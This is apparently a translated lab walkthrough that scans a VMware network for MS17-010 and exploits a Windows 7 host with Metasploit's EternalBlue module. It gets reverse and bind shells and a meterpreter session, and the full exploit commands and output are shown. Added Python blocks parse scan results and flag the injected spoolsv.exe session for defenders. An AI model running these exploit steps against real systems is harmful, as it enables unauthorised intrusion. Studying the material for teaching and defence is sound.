Scanning for MS17-010 with Nmap

Use Nmap to find which hosts in the internal 192.168.119.x /24 range have port 445 open and are vulnerable to MS17-010:

nmap -p445 --script smb-vuln-ms17-010 192.168.1.1/24

Since my internal IP is 192.168.119.136, I used this command:


nmap -p445 --script smb-vuln-ms17-010 192.168.119.1/24

root@liuwx:~# nmap -p445 --script smb-vuln-ms17-010 192.168.119.1/24 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-10 21:10 CST
Nmap scan report for 192.168.119.1
Host is up (0.00053s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.119.2
Host is up (0.00014s latency).

PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:50:56:E0:1A:4E (VMware)

Nmap scan report for 192.168.119.139
Host is up (0.00024s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:BF:20:28 (VMware)

Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 192.168.119.254
Host is up (0.00067s latency).

PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:50:56:EF:68:01 (VMware)

Nmap scan report for 192.168.119.136
Host is up (0.000033s latency).

PORT STATE SERVICE
445/tcp closed microsoft-ds

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.46 seconds


From the output above you can see that host 192.168.119.139 on the internal network is vulnerable to MS17-010!
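As an added example (not part of the original post), the Python below parses Nmap's normal output from the smb-vuln-ms17-010 script and separates hosts the script confirmed as VULNERABLE from hosts that merely have 445 open and received no verdict. The sample scan text is constructed from the post's own output; the dataclass and function names are my own.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: Nmap normal output of the kind the post shows, trimmed to
# the hosts that matter (a real file would come from `nmap ... -oN scan.txt`).
SAMPLE_SCAN = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-10 21:10 CST
Nmap scan report for 192.168.119.1
Host is up (0.00053s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.119.2
Host is up (0.00014s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Nmap scan report for 192.168.119.139
Host is up (0.00024s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:BF:20:28 (VMware)

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 192.168.119.254
Host is up (0.00067s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds

Nmap done: 256 IP addresses (4 hosts up) scanned in 2.46 seconds
"""


@dataclass
class HostResult:
    ip: str
    port_state: str = "unknown"   # state of 445/tcp: open / closed / filtered
    vulnerable: bool = False      # script printed "State: VULNERABLE"
    cves: list[str] = field(default_factory=list)


# "Nmap scan report for 1.2.3.4" or "Nmap scan report for name (1.2.3.4)"
REPORT_RE = re.compile(r"^Nmap scan report for (.+?)(?: \((\d+\.\d+\.\d+\.\d+)\))?$")
PORT_RE = re.compile(r"^445/tcp\s+(\S+)")
STATE_RE = re.compile(r"^\|\s+State:\s+(\S+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d+")


def parse_ms17_010_scan(text: str) -> list[HostResult]:
    """Walk the report host by host; NSE script output lines start with '|'."""
    hosts: list[HostResult] = []
    current: HostResult | None = None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = HostResult(ip=m.group(2) or m.group(1))
            hosts.append(current)
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            current.port_state = m.group(1)
            continue
        m = STATE_RE.match(line)
        if m:
            current.vulnerable = m.group(1) == "VULNERABLE"
            continue
        if line.startswith("|"):
            for cve in CVE_RE.findall(line):
                if cve not in current.cves:
                    current.cves.append(cve)
    return hosts


def vulnerable_hosts(text: str) -> list[str]:
    """Hosts the script confirmed as VULNERABLE: patch or isolate these first."""
    return [h.ip for h in parse_ms17_010_scan(text) if h.vulnerable]


def open_but_unconfirmed(text: str) -> list[str]:
    """445 open but no verdict: not proven patched, so still needs a patch-level check."""
    return [h.ip for h in parse_ms17_010_scan(text)
            if h.port_state == "open" and not h.vulnerable]


if __name__ == "__main__":
    print("vulnerable:", vulnerable_hosts(SAMPLE_SCAN))
    print("open, unverified:", open_but_unconfirmed(SAMPLE_SCAN))
```

Nmap prints script output only when the script has something to report, so a host with 445 open and no smb-vuln-ms17-010 block may be patched, may have SMBv1 disabled, or may simply not have completed the check; treat it as unverified rather than clean. For anything beyond a one-off, run the scan with `-oX` and walk the XML with `xml.etree.ElementTree` instead of regexes over the human-readable form.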

Exploiting MS17-010

Straight to the command:

use exploit/windows/smb/ms17_010_eternalblue


Set the target IP, then run:

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.119.139:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Command shell session 4 opened (192.168.119.136:4444 -> 192.168.119.139:49169) at 2019-10-10 21:14:11 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>


EternalBlue exploitation succeeded! But what comes back is only a cmd shell.

That is because the payload msf uses by default is: payload/windows/x64/shell/reverse_tcp

We can set a different payload:

set payload windows/x64/meterpreter/reverse_tcp

Once it is set, run show options to see which parameters need to be set:

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.119.139 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.119.136 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

Generally you only need to set RHOSTS and RPORT; msf fills in the rest for you automatically!

Finally, run exploit and see:

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.119.139:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.119.139
[*] Meterpreter session 5 opened (192.168.119.136:4444 -> 192.168.119.139:49211) at 2019-10-10 21:24:40 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

You can see that this time what comes back is a meterpreter session; as for what it can do, heh, you know~

A bind (forward-connect) payload also works:

set payload windows/x64/meterpreter/bind_tcp

meterpreter > netstat -ano

Connection list
===============

Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 712/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:5357 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 396/wininit.exe
tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 764/svchost.exe
tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 928/svchost.exe
tcp 0.0.0.0:49155 0.0.0.0:* LISTEN 0 0 496/services.exe
tcp 0.0.0.0:49156 0.0.0.0:* LISTEN 0 0 2028/svchost.exe
tcp 0.0.0.0:49157 0.0.0.0:* LISTEN 0 0 504/lsass.exe
tcp 192.168.119.139:139 0.0.0.0:* LISTEN 0 0 4/System
tcp 192.168.119.139:4444 192.168.119.136:45747 ESTABLISHED 0 0 1248/spoolsv.exe
tcp 192.168.119.139:49159 192.168.119.136:4444 ESTABLISHED 0 0 1248/spoolsv.exe
tcp 192.168.119.139:49187 118.112.253.1:80 ESTABLISHED 0 0 928/svchost.exe
tcp 192.168.119.139:49188 63.147.242.144:80 ESTABLISHED 0 0 928/svchost.exe
tcp 192.168.119.139:49189 51.143.111.81:80 SYN_SENT 0 0 648/wermgr.exe
tcp6 :::135 :::* LISTEN 0 0 712/svchost.exe
tcp6 :::445 :::* LISTEN 0 0 4/System
tcp6 :::5357 :::* LISTEN 0 0 4/System
tcp6 :::49152 :::* LISTEN 0 0 396/wininit.exe
tcp6 :::49153 :::* LISTEN 0 0 764/svchost.exe
tcp6 :::49154 :::* LISTEN 0 0 928/svchost.exe
tcp6 :::49155 :::* LISTEN 0 0 496/services.exe
tcp6 :::49156 :::* LISTEN 0 0 2028/svchost.exe
tcp6 :::49157 :::* LISTEN 0 0 504/lsass.exe
udp 0.0.0.0:500 0.0.0.0:* 0 0 928/svchost.exe
udp 0.0.0.0:3702 0.0.0.0:* 0 0 1576/svchost.exe
udp 0.0.0.0:3702 0.0.0.0:* 0 0 1576/svchost.exe
udp 0.0.0.0:4500 0.0.0.0:* 0 0 928/svchost.exe
udp 0.0.0.0:5355 0.0.0.0:* 0 0 984/svchost.exe
udp 0.0.0.0:61604 0.0.0.0:* 0 0 1576/svchost.exe
udp 127.0.0.1:1900 0.0.0.0:* 0 0 1576/svchost.exe
udp 127.0.0.1:65412 0.0.0.0:* 0 0 1576/svchost.exe
udp 192.168.119.139:137 0.0.0.0:* 0 0 4/System
udp 192.168.119.139:138 0.0.0.0:* 0 0 4/System
udp 192.168.119.139:1900 0.0.0.0:* 0 0 1576/svchost.exe
udp 192.168.119.139:65411 0.0.0.0:* 0 0 1576/svchost.exe
udp6 :::500 :::* 0 0 928/svchost.exe
udp6 :::3702 :::* 0 0 1576/svchost.exe
udp6 :::3702 :::* 0 0 1576/svchost.exe
udp6 :::4500 :::* 0 0 928/svchost.exe
udp6 :::5355 :::* 0 0 984/svchost.exe
udp6 :::61605 :::* 0 0 1576/svchost.exe
udp6 ::1:1900 :::* 0 0 1576/svchost.exe
udp6 ::1:65410 :::* 0 0 1576/svchost.exe
udp6 fe80::f50f:3929:7979:5c54:1900 :::* 0 0 1576/svchost.exe
udp6 fe80::f50f:3929:7979:5c54:65409 :::* 0 0 1576/svchost.exe

meterpreter >

Looking at the port listening state, you can see:

192.168.119.139:4444 is connected to 192.168.119.136:45747, and the process the session was injected into is spoolsv.exe.
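The point the post ends on, that the session lives inside spoolsv.exe, is exactly what a defender looks for on the host. As an added example (not from the post), the Python below parses `netstat -ano`-style rows like the ones shown and flags sockets owned by core Windows service processes that hold an ESTABLISHED session to anything other than an expected peer port, plus any socket on a port tied to a default handler (4444, the Metasploit default LPORT seen in the post). The sample rows are a constructed subset of the post's listing; the process set, port allowlists and function names are my own assumptions.

```python
from __future__ import annotations
from dataclasses import dataclass, field

# Constructed sample: a subset of the `netstat -ano` listing shown in the post,
# with whitespace collapsed the same way the post shows it.
SAMPLE_NETSTAT = """\
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 712/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:49157 0.0.0.0:* LISTEN 0 0 504/lsass.exe
tcp 192.168.119.139:4444 192.168.119.136:45747 ESTABLISHED 0 0 1248/spoolsv.exe
tcp 192.168.119.139:49159 192.168.119.136:4444 ESTABLISHED 0 0 1248/spoolsv.exe
tcp 192.168.119.139:49187 118.112.253.1:80 ESTABLISHED 0 0 928/svchost.exe
tcp6 :::445 :::* LISTEN 0 0 4/System
udp 192.168.119.139:137 0.0.0.0:* 0 0 4/System
"""

# Service processes that rarely own an ESTABLISHED TCP session themselves (assumed
# baseline; lsass.exe is left out because it legitimately talks to domain controllers).
# The post's session sits inside spoolsv.exe, which is exactly this pattern.
SERVICE_PROCESSES = {"spoolsv.exe", "wininit.exe", "services.exe", "winlogon.exe", "csrss.exe"}

# Remote ports a given service process may legitimately connect to (assumed):
# the spooler talks to network printers over raw 9100, LPD 515 and IPP 631.
EXPECTED_REMOTE_PORTS = {"spoolsv.exe": {9100, 515, 631}}

# Ports tied to off-the-shelf handlers left on defaults; tune to your environment.
SUSPECT_PORTS = {4444}


@dataclass
class Socket:
    proto: str
    local: str
    remote: str
    state: str
    pid: int
    program: str


@dataclass
class Finding:
    socket: Socket
    reasons: list[str] = field(default_factory=list)


def port_of(endpoint: str) -> int | None:
    """'192.168.119.139:4444' -> 4444; ':::*' or '0.0.0.0:*' -> None."""
    _, _, port = endpoint.rpartition(":")
    return int(port) if port.isdigit() else None


def parse_netstat(text: str) -> list[Socket]:
    sockets = []
    for line in text.splitlines():
        f = line.split()
        if not f or f[0] not in ("tcp", "tcp6", "udp", "udp6"):
            continue
        # UDP rows have no State column, so take PID/Program from the end of the row.
        state = f[3] if f[0].startswith("tcp") else ""
        pid, _, prog = f[-1].partition("/")
        sockets.append(Socket(f[0], f[1], f[2], state, int(pid), prog))
    return sockets


def triage_netstat(text: str) -> list[Finding]:
    findings = []
    for s in parse_netstat(text):
        reasons = []
        prog = s.program.lower()
        if s.state == "ESTABLISHED" and prog in SERVICE_PROCESSES:
            if port_of(s.remote) not in EXPECTED_REMOTE_PORTS.get(prog, set()):
                reasons.append("established-session-in-service-process")
        for side, ep in (("local", s.local), ("remote", s.remote)):
            p = port_of(ep)
            if p in SUSPECT_PORTS:
                reasons.append(f"suspect-{side}-port:{p}")
        if reasons:
            findings.append(Finding(s, reasons))
    return findings


if __name__ == "__main__":
    for f in triage_netstat(SAMPLE_NETSTAT):
        s = f.socket
        print(f"{s.program}[{s.pid}] {s.local} -> {s.remote} {s.state}: {', '.join(f.reasons)}")
```

Both sessions from the post surface this way: the reverse one (spoolsv.exe connected out to 192.168.119.136:4444) and the bind one (spoolsv.exe holding the 4444 side with a peer on 45747). The process rule is the one to rely on, since the port rule only catches tooling left on its defaults; a spooler with a TCP session to anything but a printer port is worth an immediate look regardless of port.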